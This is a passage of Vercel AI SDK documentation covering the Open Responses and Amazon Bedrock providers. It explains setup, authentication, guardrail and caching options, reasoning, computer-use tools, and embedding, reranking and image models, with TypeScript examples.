      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: new URL(
            'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/ai.pdf?raw=true',
          ),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
});

Option 2: Base64-encoded PDF document

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Computer Use	Web Search	Tool Search	Compaction
`claude-opus-4-7`
`claude-opus-4-6`
`claude-sonnet-4-6`
`claude-opus-4-5`
`claude-haiku-4-5`
`claude-sonnet-4-5`
`claude-opus-4-1`
`claude-opus-4-0`
`claude-sonnet-4-0`

title: Open Responses description: Learn how to use the Open Responses provider for the AI SDK.

Open Responses Provider

The Open Responses provider contains language model support for Open Responses compatible APIs.

Setup

The Open Responses provider is available in the @ai-sdk/open-responses module. You can install it with

Provider Instance

Create an Open Responses provider instance using createOpenResponses:

import { createOpenResponses } from '@ai-sdk/open-responses';

const openResponses = createOpenResponses({
  name: 'aProvider',
  url: 'http://localhost:1234/v1/responses',
});

The name and url options are required:

name string

Provider name. Used as the key for provider options and metadata.
url string

URL for the Open Responses API POST endpoint.

You can use the following optional settings to customize the Open Responses provider instance:

apiKey string

API key that is being sent using the Authorization header.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function.

Language Models

The Open Responses provider instance is a function that you can invoke to create a language model:

const model = openResponses('mistralai/ministral-3-14b-reasoning');

You can use Open Responses models with the generateText and streamText functions, and they support structured data generation with Output (see AI SDK Core).

Example

import { createOpenResponses } from '@ai-sdk/open-responses';
import { generateText } from 'ai';

const openResponses = createOpenResponses({
  name: 'aProvider',
  url: 'http://localhost:1234/v1/responses',
});

const { text } = await generateText({
  model: openResponses('mistralai/ministral-3-14b-reasoning'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Notes

Stop sequences, topK, and seed are not supported and are ignored with warnings.
Image inputs are supported for user messages with file parts using image media types.

title: Amazon Bedrock description: Learn how to use the Amazon Bedrock provider.

Amazon Bedrock Provider

The Amazon Bedrock provider for the AI SDK contains language model support for the Amazon Bedrock APIs.

Setup

The Bedrock provider is available in the @ai-sdk/amazon-bedrock module. You can install it with

Prerequisites

See the Model Access Docs for more information.

Authentication

Using IAM Access Key and Secret Key

Step 1: Creating AWS Access Key and Secret Key

To get started, you'll need to create an AWS access key and secret key. Here's how:

Login to AWS Management Console

Go to the AWS Management Console and log in with your AWS account credentials.

Create an IAM User

Navigate to the IAM dashboard and click on "Users" in the left-hand navigation menu.
Click on "Create user" and fill in the required details to create a new IAM user.
Make sure to select "Programmatic access" as the access type.
The user account needs the AmazonBedrockFullAccess policy attached to it.

Create Access Key

Click on the "Security credentials" tab and then click on "Create access key".
Click "Create access key" to generate a new access key pair.
Download the .csv file containing the access key ID and secret access key.

Step 2: Configuring the Access Key and Secret Key

Within your project add a .env file if you don't already have one. This file will be used to set the access key and secret key as environment variables. Add the following lines to the .env file:

AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY=YOUR_SECRET_ACCESS_KEY
AWS_REGION=YOUR_REGION

Remember to replace YOUR_ACCESS_KEY_ID, YOUR_SECRET_ACCESS_KEY, and YOUR_REGION with the actual values from your AWS account.

Using AWS SDK Credentials Chain (instance profiles, instance roles, ECS roles, EKS Service Accounts, etc.)

Usage:

@aws-sdk/credential-providers package provides a set of credential providers that can be used to create a credential provider chain.

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
import { fromNodeProviderChain } from '@aws-sdk/credential-providers';

const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  credentialProvider: fromNodeProviderChain(),
});

Provider Instance

You can import the default provider instance bedrock from @ai-sdk/amazon-bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';

If you need a customized setup, you can import createAmazonBedrock from @ai-sdk/amazon-bedrock and create a provider instance with your settings:

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';

const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  accessKeyId: 'xxxxxxxxx',
  secretAccessKey: 'xxxxxxxxx',
  sessionToken: 'xxxxxxxxx',
});

You can use the following optional settings to customize the Amazon Bedrock provider instance:

region string

The AWS region that you want to use for the API calls. It uses the AWS_REGION environment variable by default.
accessKeyId string

The AWS access key ID that you want to use for the API calls. It uses the AWS_ACCESS_KEY_ID environment variable by default.
secretAccessKey string

The AWS secret access key that you want to use for the API calls. It uses the AWS_SECRET_ACCESS_KEY environment variable by default.
sessionToken string

Optional. The AWS session token that you want to use for the API calls. It uses the AWS_SESSION_TOKEN environment variable by default.
credentialProvider () => Promise<{ accessKeyId: string; secretAccessKey: string; sessionToken?: string; }>

Optional. The AWS credential provider chain that you want to use for the API calls. It uses the specified credentials by default.
apiKey string

Optional. API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the AWS_BEARER_TOKEN_BEDROCK environment variable by default.
baseURL string

Optional. Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
headers Record<string, string>

Optional. Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Optional. Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Bedrock API using the provider instance. The first argument is the model id, e.g. meta.llama3-70b-instruct-v1:0.

const model = bedrock('meta.llama3-70b-instruct-v1:0');

Amazon Bedrock models also support some model specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

const model = bedrock('anthropic.claude-3-sonnet-20240229-v1:0');

await generateText({
  model,
  providerOptions: {
    anthropic: {
      additionalModelRequestFields: { top_k: 350 },
    },
  },
});

Documentation for additional settings based on the selected model can be found within the Amazon Bedrock Inference Parameter Documentation.

You can use Amazon Bedrock language models to generate text with the generateText function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Amazon Bedrock language models can also be used in the streamText function (see AI SDK Core).

File Inputs

The Amazon Bedrock provider supports file inputs, e.g. PDF files.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('anthropic.claude-3-haiku-20240307-v1:0'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe the pdf in detail.' },
        {
          type: 'file',
          data: readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

Guardrails

You can use the bedrock provider options to utilize Amazon Bedrock Guardrails:

import { type AmazonBedrockLanguageModelOptions } from '@ai-sdk/amazon-bedrock';

const result = await generateText({
  model: bedrock('anthropic.claude-3-sonnet-20240229-v1:0'),
  prompt: 'Write a story about space exploration.',
  providerOptions: {
    bedrock: {
      guardrailConfig: {
        guardrailIdentifier: '1abcd2ef34gh',
        guardrailVersion: '1',
        trace: 'enabled' as const,
        streamProcessingMode: 'async',
      },
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

Tracing information will be returned in the provider metadata if you have tracing enabled.

if (result.providerMetadata?.bedrock.trace) {
  // ...
}

See the Amazon Bedrock Guardrails documentation for more information.

Citations

Amazon Bedrock supports citations for document-based inputs across compatible models. When enabled:

Some models can read documents with visual understanding, not just extracting text
Models can cite specific parts of documents you provide, making it easier to trace information back to its source (Not Supported Yet)

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText, Output } from 'ai';
import { z } from 'zod';
import fs from 'fs';

const result = await generateText({
  model: bedrock('apac.anthropic.claude-sonnet-4-20250514-v1:0'),
  output: Output.object({
    schema: z.object({
      summary: z.string().describe('Summary of the PDF document'),
      keyPoints: z.array(z.string()).describe('Key points from the PDF'),
    }),
  }),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Summarize this PDF and provide key points.',
        },
        {
          type: 'file',
          data: readFileSync('./document.pdf'),
          mediaType: 'application/pdf',
          providerOptions: {
            bedrock: {
              citations: { enabled: true },
            },
          },
        },
      ],
    },
  ],
});

console.log('Response:', result.output);

Cache Points

You can also specify a TTL (time-to-live) for cache points using the ttl property. Supported values are '5m' (5 minutes, default) and '1h' (1 hour). The 1-hour TTL is only supported by Claude Opus 4.5, Claude Haiku 4.5, and Claude Sonnet 4.5.

providerOptions: {
  bedrock: { cachePoint: { type: 'default', ttl: '1h' } },
}

Cache usage information is returned in the providerMetadata object. See examples below.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const cyberpunkAnalysis =
  '... literary analysis of cyberpunk themes and concepts ...';

const result = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  messages: [
    {
      role: 'system',
      content: `You are an expert on William Gibson's cyberpunk literature and themes. You have access to the following academic analysis: ${cyberpunkAnalysis}`,
      providerOptions: {
        bedrock: { cachePoint: { type: 'default' } },
      },
    },
    {
      role: 'user',
      content:
        'What are the key cyberpunk themes that Gibson explores in Neuromancer?',
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.bedrock?.usage);
// Shows cache read/write token usage, e.g.:
// {
//   cacheReadInputTokens: 1337,
//   cacheWriteInputTokens: 42,
// }

Cache points also work with streaming responses:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const cyberpunkAnalysis =
  '... literary analysis of cyberpunk themes and concepts ...';

const result = streamText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  messages: [
    {
      role: 'assistant',
      content: [
        { type: 'text', text: 'You are an expert on cyberpunk literature.' },
        { type: 'text', text: `Academic analysis: ${cyberpunkAnalysis}` },
      ],
      providerOptions: { bedrock: { cachePoint: { type: 'default' } } },
    },
    {
      role: 'user',
      content:
        'How does Gibson explore the relationship between humanity and technology?',
    },
  ],
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log(
  'Cache token usage:',
  (await result.providerMetadata)?.bedrock?.usage,
);
// Shows cache read/write token usage, e.g.:
// {
//   cacheReadInputTokens: 1337,
//   cacheWriteInputTokens: 42,
// }

Provider Metadata

The following Bedrock-specific metadata may be returned in providerMetadata.bedrock:

trace (optional) Guardrail tracing information (when tracing is enabled).
performanceConfig (optional) Performance configuration, e.g. { latency: 'optimized' }.
serviceTier (optional) Service tier information, e.g. { type: 'on-demand' }.
usage (optional) Cache token usage details including cacheWriteInputTokens and cacheDetails.
stopSequence string | null The stop sequence that triggered the stop, if any.

Reasoning

Amazon Bedrock supports model creator-specific reasoning features:

Anthropic (e.g. claude-sonnet-4-5-20250929): enable via the reasoningConfig provider option and specifying a thinking budget in tokens (minimum: 1024, maximum: 64000).
Amazon (e.g. us.amazon.nova-2-lite-v1:0): enable via the reasoningConfig provider option and specifying a maximum reasoning effort level ('low' | 'medium' | 'high').

import {
  bedrock,
  type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

// Anthropic example
const anthropicResult = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    bedrock: {
      reasoningConfig: { type: 'enabled', budgetTokens: 1024 },
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

console.log(anthropicResult.reasoningText); // reasoning text
console.log(anthropicResult.text); // text response

// Nova 2 example
const amazonResult = await generateText({
  model: bedrock('us.amazon.nova-2-lite-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    bedrock: {
      reasoningConfig: { type: 'enabled', maxReasoningEffort: 'medium' },
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

console.log(amazonResult.reasoningText); // reasoning text
console.log(amazonResult.text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Service Tiers

Amazon Bedrock supports selecting an inference service tier per request via the serviceTier provider option.

import {
  bedrock,
  type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
  prompt: 'Summarize this support ticket backlog.',
  providerOptions: {
    bedrock: {
      serviceTier: 'priority',
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

Supported values are:

reserved
priority
default
flex

See the Amazon Bedrock service tiers documentation for model availability and behavior.

Extended Context Window

Claude Sonnet 4 models on Amazon Bedrock support an extended context window of up to 1 million tokens when using the context-1m-2025-08-07 beta feature.

import {
  bedrock,
  type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
  prompt: 'analyze this large document...',
  providerOptions: {
    bedrock: {
      anthropicBeta: ['context-1m-2025-08-07'],
    } satisfies AmazonBedrockLanguageModelOptions,
  },
});

Computer Use

Via Anthropic, Amazon Bedrock provides three provider-defined tools that can be used to interact with external systems:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = bedrock.tools.bash_20241022({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files.

For Claude 4 models (Opus & Sonnet):

const textEditorTool = bedrock.tools.textEditor_20250429({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    insert_text,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

For Claude 3.5 Sonnet and earlier models:

const textEditorTool = bedrock.tools.textEditor_20241022({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    insert_text,
    old_str,
    view_range,
  }) => {
    // Implement your text editing logic here
    // Return the result of the text editing operation
  },
});

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is only available in Claude 3.5 Sonnet and earlier models.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace command.
insert_text (string, optional): Required for insert command, containing the text to insert.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

When using the Text Editor Tool, make sure to name the key in the tools object correctly:

Claude 4 models: Use str_replace_based_edit_tool
Claude 3.5 Sonnet and earlier: Use str_replace_editor

// For Claude 4 models
const response = await generateText({
  model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
  prompt:
    "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    str_replace_based_edit_tool: textEditorTool, // Claude 4 tool name
  },
});

// For Claude 3.5 Sonnet and earlier
const response = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt:
    "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    str_replace_editor: textEditorTool, // Earlier models tool name
  },
});

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = bedrock.tools.computer_20241022({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments

  execute: async ({ action, coordinate, text }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput({ output }) {
    return typeof output === 'string'
      ? [{ type: 'text', text: output }]
      : [{ type: 'image', data: output.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.

These tools can be used in conjunction with the anthropic.claude-3-5-sonnet-20240620-v1:0 model to enable more complex interactions and tasks.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`amazon.titan-tg1-large`
`amazon.titan-text-express-v1`
`amazon.titan-text-lite-v1`
`us.amazon.nova-premier-v1:0`
`us.amazon.nova-pro-v1:0`
`us.amazon.nova-lite-v1:0`
`us.amazon.nova-micro-v1:0`
`anthropic.claude-haiku-4-5-20251001-v1:0`
`anthropic.claude-sonnet-4-20250514-v1:0`
`anthropic.claude-sonnet-4-5-20250929-v1:0`
`anthropic.claude-opus-4-20250514-v1:0`
`anthropic.claude-opus-4-1-20250805-v1:0`
`anthropic.claude-3-5-sonnet-20241022-v2:0`
`anthropic.claude-3-5-sonnet-20240620-v1:0`
`anthropic.claude-3-opus-20240229-v1:0`
`anthropic.claude-3-sonnet-20240229-v1:0`
`anthropic.claude-3-haiku-20240307-v1:0`
`us.anthropic.claude-sonnet-4-20250514-v1:0`
`us.anthropic.claude-sonnet-4-5-20250929-v1:0`
`us.anthropic.claude-opus-4-20250514-v1:0`
`us.anthropic.claude-opus-4-1-20250805-v1:0`
`us.anthropic.claude-3-5-sonnet-20241022-v2:0`
`us.anthropic.claude-3-5-sonnet-20240620-v1:0`
`us.anthropic.claude-3-sonnet-20240229-v1:0`
`us.anthropic.claude-3-opus-20240229-v1:0`
`us.anthropic.claude-3-haiku-20240307-v1:0`
`anthropic.claude-v2`
`anthropic.claude-v2:1`
`anthropic.claude-instant-v1`
`cohere.command-text-v14`
`cohere.command-light-text-v14`
`cohere.command-r-v1:0`
`cohere.command-r-plus-v1:0`
`us.deepseek.r1-v1:0`
`meta.llama3-8b-instruct-v1:0`
`meta.llama3-70b-instruct-v1:0`
`meta.llama3-1-8b-instruct-v1:0`
`meta.llama3-1-70b-instruct-v1:0`
`meta.llama3-1-405b-instruct-v1:0`
`meta.llama3-2-1b-instruct-v1:0`
`meta.llama3-2-3b-instruct-v1:0`
`meta.llama3-2-11b-instruct-v1:0`
`meta.llama3-2-90b-instruct-v1:0`
`us.meta.llama3-2-1b-instruct-v1:0`
`us.meta.llama3-2-3b-instruct-v1:0`
`us.meta.llama3-2-11b-instruct-v1:0`
`us.meta.llama3-2-90b-instruct-v1:0`
`us.meta.llama3-1-8b-instruct-v1:0`
`us.meta.llama3-1-70b-instruct-v1:0`
`us.meta.llama3-3-70b-instruct-v1:0`
`us.meta.llama4-scout-17b-instruct-v1:0`
`us.meta.llama4-maverick-17b-instruct-v1:0`
`mistral.mistral-7b-instruct-v0:2`
`mistral.mixtral-8x7b-instruct-v0:1`
`mistral.mistral-large-2402-v1:0`
`mistral.mistral-small-2402-v1:0`
`us.mistral.pixtral-large-2502-v1:0`
`openai.gpt-oss-120b-1:0`
`openai.gpt-oss-20b-1:0`

Embedding Models

You can create models that call the Bedrock API Bedrock API using the .embedding() factory method.

const model = bedrock.embedding('amazon.titan-embed-text-v1');

Bedrock Titan embedding model amazon.titan-embed-text-v2:0 supports several additional settings. You can pass them as an options argument:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';

const model = bedrock.embedding('amazon.titan-embed-text-v2:0');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    bedrock: {
      dimensions: 512, // optional, number of dimensions for the embedding
      normalize: true, // optional, normalize the output embeddings
    } satisfies AmazonBedrockEmbeddingModelOptions,
  },
});

The following optional provider options are available for Bedrock Titan embedding models:

dimensions: number

The number of dimensions the output embeddings should have. The following values are accepted: 1024 (default), 512, 256.
normalize boolean

Flag indicating whether or not to normalize the output embeddings. Defaults to true.

Nova Embedding Models

Amazon Nova embedding models support additional provider options:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';

const { embedding } = await embed({
  model: bedrock.embedding('amazon.nova-embed-text-v2:0'),
  value: 'sunny day at the beach',
  providerOptions: {
    bedrock: {
      embeddingDimension: 1024, // optional, number of dimensions
      embeddingPurpose: 'TEXT_RETRIEVAL', // optional, purpose of embedding
      truncate: 'END', // optional, truncation behavior
    } satisfies AmazonBedrockEmbeddingModelOptions,
  },
});

The following optional provider options are available for Nova embedding models:

embeddingDimension number

The number of dimensions for the output embeddings. Supported values: 256, 384, 1024 (default), 3072.
embeddingPurpose string

The purpose of the embedding. Accepts: GENERIC_INDEX (default), TEXT_RETRIEVAL, IMAGE_RETRIEVAL, VIDEO_RETRIEVAL, DOCUMENT_RETRIEVAL, AUDIO_RETRIEVAL, GENERIC_RETRIEVAL, CLASSIFICATION, CLUSTERING.
truncate string

Truncation behavior when input exceeds the model's context length. Accepts: NONE, START, END (default).

Cohere Embedding Models

Cohere embedding models on Bedrock require an inputType and support truncation:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';

const { embedding } = await embed({
  model: bedrock.embedding('cohere.embed-english-v3'),
  value: 'sunny day at the beach',
  providerOptions: {
    bedrock: {
      inputType: 'search_document', // required for Cohere
      truncate: 'END', // optional, truncation behavior
    } satisfies AmazonBedrockEmbeddingModelOptions,
  },
});

The following provider options are available for Cohere embedding models:

inputType string

Input type for Cohere embedding models. Accepts: search_document, search_query (default), classification, clustering.
truncate string

Truncation behavior when input exceeds the model's context length. Accepts: NONE, START, END.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`amazon.titan-embed-text-v1`	1536
`amazon.titan-embed-text-v2:0`	1024
`amazon.nova-embed-text-v2:0`	1024
`cohere.embed-english-v3`	1024
`cohere.embed-multilingual-v3`	1024

Reranking Models

You can create models that call the Bedrock Rerank API using the .reranking() factory method.

const model = bedrock.reranking('cohere.rerank-v3-5:0');

You can use Amazon Bedrock reranking models to rerank documents with the rerank function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { rerank } from 'ai';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: bedrock.reranking('cohere.rerank-v3-5:0'),
  documents,
  query: 'talk about rain',
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Amazon Bedrock reranking models support additional provider options that can be passed via providerOptions.bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: bedrock.reranking('cohere.rerank-v3-5:0'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  providerOptions: {
    bedrock: {
      nextToken: 'pagination_token_here',
    },
  },
});

The following provider options are available:

nextToken string

Token for pagination of results.
additionalModelRequestFields Record<string, unknown>

Additional model-specific request fields.

Model Capabilities

Model
`amazon.rerank-v1:0`
`cohere.rerank-v3-5:0`

Image Models

You can create models that call the Bedrock API Bedrock API using the .image() factory method.

For more on the Amazon Nova Canvas image model, see the Nova Canvas Overview.

const model = bedrock.image('amazon.nova-canvas-v1:0');

You can then generate images with the generateImage function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
});

You can also pass the providerOptions object to the generateImage function to customize the generation behavior:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
  providerOptions: {
    bedrock: {
      quality: 'premium',
      negativeText: 'blurry, low quality',
      cfgScale: 7.5,
      style: 'PHOTOREALISM',
    },
  },
});

The following optional provider options are available for Amazon Nova Canvas:

quality string

The quality level for image generation. Accepts 'standard' or 'premium'.
negativeText string

Text describing what you don't want in the generated image.
cfgScale number

Controls how closely the generated image adheres to the prompt. Higher values result in images that are more closely aligned to the prompt.
style string

Predefined visual style for image generation. Accepts one of: 3D_ANIMATED_FAMILY_FILM · DESIGN_SKETCH · FLAT_VECTOR_ILLUSTRATION · GRAPHIC_NOVEL_ILLUSTRATION · MAXIMALISM · MIDCENTURY_RETRO · PHOTOREALISM · SOFT_DIGITAL_PAINTING.

Documentation for additional settings can be found within the Amazon Bedrock User Guide for Amazon Nova Documentation.

Image Editing

Amazon Nova Canvas supports several image editing task types. When you provide input images via prompt.images, the model automatically detects the appropriate editing mode, or you can explicitly specify the taskType in provider options.

Image Variation

Create variations of an existing image while maintaining its core characteristics:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    text: 'Modernize the style, photo-realistic, 8k, hdr',
    images: [imageBuffer],
  },
  providerOptions: {
    bedrock: {
      taskType: 'IMAGE_VARIATION',
      similarityStrength: 0.7, // 0-1, higher = closer to original
      negativeText: 'bad quality, low resolution',
    },
  },
});

similarityStrength number

Controls how similar the output is to the input image. Values range from 0 to 1, where higher values produce results closer to the original.

Inpainting

Edit specific parts of an image. You can define the area to modify using either a mask image or a text prompt:

Using a mask prompt (text-based selection):

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    text: 'a cute corgi dog in the same style',
    images: [imageBuffer],
  },
  providerOptions: {
    bedrock: {
      maskPrompt: 'cat', // Describe what to replace
    },
  },
  seed: 42,
});

Using a mask image:

const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // White pixels = area to change

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask: mask,
  },
});

maskPrompt string

A text description of the area to modify. The model will automatically identify and mask the described region.

Outpainting

Extend an image beyond its original boundaries:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    text: 'A beautiful sunset landscape with mountains',
    images: [imageBuffer],
  },
  providerOptions: {
    bedrock: {
      taskType: 'OUTPAINTING',
      maskPrompt: 'background',
      outPaintingMode: 'DEFAULT', // or 'PRECISE'
    },
  },
});

outPaintingMode string

Controls how the outpainting is performed. Accepts 'DEFAULT' or 'PRECISE'.

Background Removal

Remove the background from an image:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: {
    images: [imageBuffer],
  },
  providerOptions: {
    bedrock: {
      taskType: 'BACKGROUND_REMOVAL',
    },
  },
});

Image Editing Provider Options

The following additional provider options are available for image editing:

taskType string

Explicitly set the editing task type. Accepts 'TEXT_IMAGE' (default for text-only), 'IMAGE_VARIATION', 'INPAINTING', 'OUTPAINTING', or 'BACKGROUND_REMOVAL'. When images are provided without an explicit taskType, the model defaults to 'IMAGE_VARIATION' (or 'INPAINTING' if a mask is provided).
maskPrompt string

Text description of the area to modify (for inpainting/outpainting). Alternative to providing a mask image.
similarityStrength number

For IMAGE_VARIATION: Controls similarity to the original (0-1).
outPaintingMode string

For OUTPAINTING: Controls the outpainting behavior ('DEFAULT' or 'PRECISE').

Image Model Settings

You can customize the generation behavior with optional options:

await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
  maxImagesPerCall: 1, // Maximum number of images to generate per API call
});

maxImagesPerCall number

Override the maximum number of images generated per API call. Default can vary by model, with 5 as a common default.

Model Capabilities

The Amazon Nova Canvas model supports custom sizes with constraints as follows:

Each side must be between 320-4096 pixels, inclusive.
Each side must be evenly divisible by 16.
The aspect ratio must be between 1:4 and 4:1. That is, one side can't be more than 4 times longer than the other side.
The total pixel count must be less than 4,194,304.

For more, see Image generation access and usage.

Model	Sizes
`amazon.nova-canvas-v1:0`	Custom sizes: 320-4096px per side (must be divisible by 16), aspect ratio 1:4 to 4:1, max 4.2M pixels

Response Headers

The Amazon Bedrock provider will return the response headers associated with network requests made of the Bedrock servers.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

console.log(result.response.headers);

Below is sample output where you can see the x-amzn-requestid header. This can be useful for correlating Bedrock API calls with requests made by the AI SDK:

{
  connection: 'keep-alive',
  'content-length': '2399',
  'content-type': 'application/json',
